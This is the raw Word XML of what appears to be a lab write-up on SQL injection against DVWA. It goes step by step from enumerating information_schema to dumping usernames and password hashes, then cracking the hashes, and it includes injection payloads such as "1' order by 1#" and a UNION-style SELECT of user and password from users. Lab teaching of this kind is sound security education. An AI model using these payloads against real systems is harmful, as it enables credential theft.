    </w:p>
    <w:p w14:paraId="19A46DB0" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="Heading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Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5410A7EB" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="184"/>
        <w:ind w:left="120" w:right="124"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>To display the database name, check the last line next to the surname field. Knowing the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 is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>important for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>system administration and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E06B7F1" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02CB5CAA" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57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information_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4EAE9D81" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="185"/>
        <w:ind w:left="120" w:right="119"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The Information Schema stores information about tables, columns, and all other databases</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">maintained by MySQL. To display all the tables, present in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, follow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steps.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>This can provide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database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDD3D1A" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="117DD3C2" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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information_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="23316DA1" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:sectPr w:rsidR="00230D57" w:rsidSect="009B67ED">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1420" w:right="1320" w:bottom="280" w:left="1320" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A477D26" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="60"/>
        <w:ind w:left="120" w:right="122"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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prefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>"user"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information_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Enter the SQL code below in the User ID field. This step helps identify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potentially exposing sensitive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6398F577" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E0DCE30" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Step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information_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2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table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AC0038" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="183"/>
        <w:ind w:left="120" w:right="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Print all the columns present in the "users" table, including column information like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>User_ID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2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>user,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password.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>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User_ID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>field.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Understanding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in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the "users" table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>is essential for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>targeted data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>extraction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B915D0E" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22ABAD8A" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="1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contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2D5D9A" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="185"/>
        <w:ind w:left="120" w:right="117"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>To display all the necessary authentication information present in the columns stored in the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>information_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12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returned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hashed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>format.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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password,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MD5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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Ripper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crack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Websites</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15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available</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16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paste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hash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extract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password.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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 emphasizes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 secure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practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6CA7F2" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3573E84D" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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Decrypt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Hashed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA38F57" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="183"/>
        <w:ind w:left="120" w:right="119"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>From the output above, you can observe the hashed password. Proceed to crack the hash to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>reveal the actual password. Password cracking tools such as John the Ripper and Medusa are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>useful for this purpose. Websites like crackstation.net can be used to crack the password hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>for all users. This step underscores the significance of using strong and securely hashed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBECD61" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45D9D4BC" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C3099C" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="186"/>
        <w:ind w:left="120" w:right="117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article</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>demonstrates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injection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vulnerability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Attackers can exploit it not only to reveal user or customer information but also to corrupt the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-57"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>entire database, potentially bringing down the entire system. As of the writing of this post</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>(2021),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Injection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listed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number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vulnerability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OWASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-23"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Top</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-57"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>summary.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>DVWA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15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penetration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>testers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>aiming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57"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>their skills and web developers aiming to develop systems with security in mind. Continuous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injection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robust cybersecurity practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6554934A" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10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30D57" w14:paraId="781DC6C3" w14:textId="77777777" w:rsidTr="00B25987">
        <w:trPr>
          <w:trHeight w:val="830"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9018" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F4AF83"/>
          </w:tcPr>
          <w:p w14:paraId="78A3741E" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B2598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1AA94DE" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B259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Commands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</w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00230D57" w14:paraId="11B6FD4E" w14:textId="77777777" w:rsidTr="00B25987">
        <w:trPr>
          <w:trHeight w:val="3312"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9018" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="295F16EF" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B2598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FFF9E79" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B25987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Basic Commands **</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C6F6504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68833B38" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B25987">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:right="4952"/>
              <w:jc w:val="bot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User ID field, enter “1” and click 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 ID field, enter “2” and click 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 ID field, enter “3” and click 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 ID field, enter “4” and click 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ID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field,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enter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“5”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and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click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Submit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D83BB59" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00B25987">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="550" w:lineRule="atLeast"/>
              <w:ind w:right="3727"/>
              <w:jc w:val="both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 Order By Command to find number of Columns**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1'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order by 1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#</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3420671D" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:spacing w:line="550" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00230D57" w:rsidSect="009B67ED">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1360" w:right="1320" w:bottom="280" w:left="1320" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A208BD7" w14:textId="197E00CC" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="70"/>
        <w:ind w:left="23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B27307" wp14:editId="7124528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32780" cy="8952230"/>
                <wp:effectExtent l="0" t="0" r="1270" b="1270"/>
                <wp:wrapNone/>
                <wp:docPr id="166993546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8952230"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 10459 1440"/>
                            <a:gd name="T1" fmla="*/ T0 w 9028"/>
                            <a:gd name="T2" fmla="+- 0 1440 1440"/>
                            <a:gd name="T3" fmla="*/ 1440 h 14098"/>
                            <a:gd name="T4" fmla="+- 0 1450 1440"/>
                            <a:gd name="T5" fmla="*/ T4 w 9028"/>
                            <a:gd name="T6" fmla="+- 0 1440 1440"/>
                            <a:gd name="T7" fmla="*/ 1440 h 14098"/>
                            <a:gd name="T8" fmla="+- 0 1440 1440"/>
                            <a:gd name="T9" fmla="*/ T8 w 9028"/>
                            <a:gd name="T10" fmla="+- 0 1440 1440"/>
                            <a:gd name="T11" fmla="*/ 1440 h 14098"/>
                            <a:gd name="T12" fmla="+- 0 1440 1440"/>
                            <a:gd name="T13" fmla="*/ T12 w 9028"/>
                            <a:gd name="T14" fmla="+- 0 1450 1440"/>
                            <a:gd name="T15" fmla="*/ 1450 h 14098"/>
                            <a:gd name="T16" fmla="+- 0 1440 1440"/>
                            <a:gd name="T17" fmla="*/ T16 w 9028"/>
                            <a:gd name="T18" fmla="+- 0 1450 1440"/>
                            <a:gd name="T19" fmla="*/ 1450 h 14098"/>
                            <a:gd name="T20" fmla="+- 0 1440 1440"/>
                            <a:gd name="T21" fmla="*/ T20 w 9028"/>
                            <a:gd name="T22" fmla="+- 0 15528 1440"/>
                            <a:gd name="T23" fmla="*/ 15528 h 14098"/>
                            <a:gd name="T24" fmla="+- 0 1440 1440"/>
                            <a:gd name="T25" fmla="*/ T24 w 9028"/>
                            <a:gd name="T26" fmla="+- 0 15537 1440"/>
                            <a:gd name="T27" fmla="*/ 15537 h 14098"/>
                            <a:gd name="T28" fmla="+- 0 1450 1440"/>
                            <a:gd name="T29" fmla="*/ T28 w 9028"/>
                            <a:gd name="T30" fmla="+- 0 15537 1440"/>
                            <a:gd name="T31" fmla="*/ 15537 h 14098"/>
                            <a:gd name="T32" fmla="+- 0 10459 1440"/>
                            <a:gd name="T33" fmla="*/ T32 w 9028"/>
                            <a:gd name="T34" fmla="+- 0 15537 1440"/>
                            <a:gd name="T35" fmla="*/ 15537 h 14098"/>
                            <a:gd name="T36" fmla="+- 0 10459 1440"/>
                            <a:gd name="T37" fmla="*/ T36 w 9028"/>
                            <a:gd name="T38" fmla="+- 0 15528 1440"/>
                            <a:gd name="T39" fmla="*/ 15528 h 14098"/>
                            <a:gd name="T40" fmla="+- 0 1450 1440"/>
                            <a:gd name="T41" fmla="*/ T40 w 9028"/>
                            <a:gd name="T42" fmla="+- 0 15528 1440"/>
                            <a:gd name="T43" fmla="*/ 15528 h 14098"/>
                            <a:gd name="T44" fmla="+- 0 1450 1440"/>
                            <a:gd name="T45" fmla="*/ T44 w 9028"/>
                            <a:gd name="T46" fmla="+- 0 1450 1440"/>
                            <a:gd name="T47" fmla="*/ 1450 h 14098"/>
                            <a:gd name="T48" fmla="+- 0 10459 1440"/>
                            <a:gd name="T49" fmla="*/ T48 w 9028"/>
                            <a:gd name="T50" fmla="+- 0 1450 1440"/>
                            <a:gd name="T51" fmla="*/ 1450 h 14098"/>
                            <a:gd name="T52" fmla="+- 0 10459 1440"/>
                            <a:gd name="T53" fmla="*/ T52 w 9028"/>
                            <a:gd name="T54" fmla="+- 0 1440 1440"/>
                            <a:gd name="T55" fmla="*/ 1440 h 14098"/>
                            <a:gd name="T56" fmla="+- 0 10468 1440"/>
                            <a:gd name="T57" fmla="*/ T56 w 9028"/>
                            <a:gd name="T58" fmla="+- 0 1440 1440"/>
                            <a:gd name="T59" fmla="*/ 1440 h 14098"/>
                            <a:gd name="T60" fmla="+- 0 10459 1440"/>
                            <a:gd name="T61" fmla="*/ T60 w 9028"/>
                            <a:gd name="T62" fmla="+- 0 1440 1440"/>
                            <a:gd name="T63" fmla="*/ 1440 h 14098"/>
                            <a:gd name="T64" fmla="+- 0 10459 1440"/>
                            <a:gd name="T65" fmla="*/ T64 w 9028"/>
                            <a:gd name="T66" fmla="+- 0 1450 1440"/>
                            <a:gd name="T67" fmla="*/ 1450 h 14098"/>
                            <a:gd name="T68" fmla="+- 0 10459 1440"/>
                            <a:gd name="T69" fmla="*/ T68 w 9028"/>
                            <a:gd name="T70" fmla="+- 0 1450 1440"/>
                            <a:gd name="T71" fmla="*/ 1450 h 14098"/>
                            <a:gd name="T72" fmla="+- 0 10459 1440"/>
                            <a:gd name="T73" fmla="*/ T72 w 9028"/>
                            <a:gd name="T74" fmla="+- 0 15528 1440"/>
                            <a:gd name="T75" fmla="*/ 15528 h 14098"/>
                            <a:gd name="T76" fmla="+- 0 10459 1440"/>
                            <a:gd name="T77" fmla="*/ T76 w 9028"/>
                            <a:gd name="T78" fmla="+- 0 15537 1440"/>
                            <a:gd name="T79" fmla="*/ 15537 h 14098"/>
                            <a:gd name="T80" fmla="+- 0 10468 1440"/>
                            <a:gd name="T81" fmla="*/ T80 w 9028"/>
                            <a:gd name="T82" fmla="+- 0 15537 1440"/>
                            <a:gd name="T83" fmla="*/ 15537 h 14098"/>
                            <a:gd name="T84" fmla="+- 0 10468 1440"/>
                            <a:gd name="T85" fmla="*/ T84 w 9028"/>
                            <a:gd name="T86" fmla="+- 0 15528 1440"/>
                            <a:gd name="T87" fmla="*/ 15528 h 14098"/>
                            <a:gd name="T88" fmla="+- 0 10468 1440"/>
                            <a:gd name="T89" fmla="*/ T88 w 9028"/>
                            <a:gd name="T90" fmla="+- 0 1450 1440"/>
                            <a:gd name="T91" fmla="*/ 1450 h 14098"/>
                            <a:gd name="T92" fmla="+- 0 10468 1440"/>
                            <a:gd name="T93" fmla="*/ T92 w 9028"/>
                            <a:gd name="T94" fmla="+- 0 1450 1440"/>
                            <a:gd name="T95" fmla="*/ 1450 h 14098"/>
                            <a:gd name="T96" fmla="+- 0 10468 1440"/>
                            <a:gd name="T97" fmla="*/ T96 w 9028"/>
                            <a:gd name="T98" fmla="+- 0 1440 1440"/>
                            <a:gd name="T99" fmla="*/ 1440 h 140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9028" h="14098">
                              <a:moveTo>
                                <a:pt x="901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088"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="14097"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="10" y="14097"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9019" y="14097"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9019" y="14088"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="10" y="14088"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="10" y="10"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9019" y="10"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9019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9019" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9019" y="10"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9019" y="14088"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9019" y="14097"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9028" y="14097"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9028" y="14088"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="9028" y="1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2BF1C" id="Freeform: Shape 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:1in;width:451.4pt;height:70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1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" path="m9019,l10,,,,,10,,14088r,9l10,14097r9009,l9019,14088r-9009,l10,10r9009,l9019,xm9028,r-9,l9019,10r,14078l9019,14097r9,l9028,14088,9028,10r,-10xe" fillcolor="black" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="5727065,914400;6350,914400;0,914400;0,920750;0,920750;0,9860280;0,9865995;6350,9865995;5727065,9865995;5727065,9860280;6350,9860280;6350,920750;5727065,920750;5727065,914400;5732780,914400;5727065,914400;5727065,920750;5727065,920750;5727065,9860280;5727065,9865995;5732780,9865995;5732780,9860280;5732780,920750;5732780,920750;5732780,91440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shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>1'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order by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#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA19BCF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2BE332D6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Display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all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values which passes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surname condition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not check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 Username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4621FF07" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21418DBB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1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE6FEC5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AC8C27A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1'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SELECT user,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password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from users#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D9A65A" w14:textId="51834E64" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57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F390FB" wp14:editId="1549F687">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>986155</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>175895</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2861310" cy="175260"/>
                <wp:effectExtent l="0" t="0" r="635" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="123900078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310" cy="1752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EB4B" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
                            <w:pPr>
                              <w:pStyle w:val="BodyText"/>
                              <w:spacing w:line="275" w:lineRule="exact"/>
                            </w:pPr>
                            <w:r>
                              <w:t>'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password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users#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390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7.65pt;margin-top:13.85pt;width:225.3pt;height:13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" fillcolor="yellow" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="110DEB4B" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
                      <w:pPr>
                        <w:pStyle w:val="BodyText"/>
                        <w:spacing w:line="275" w:lineRule="exact"/>
                      </w:pPr>
                      <w:r>
                        <w:t>'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password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users#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CF90FB" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
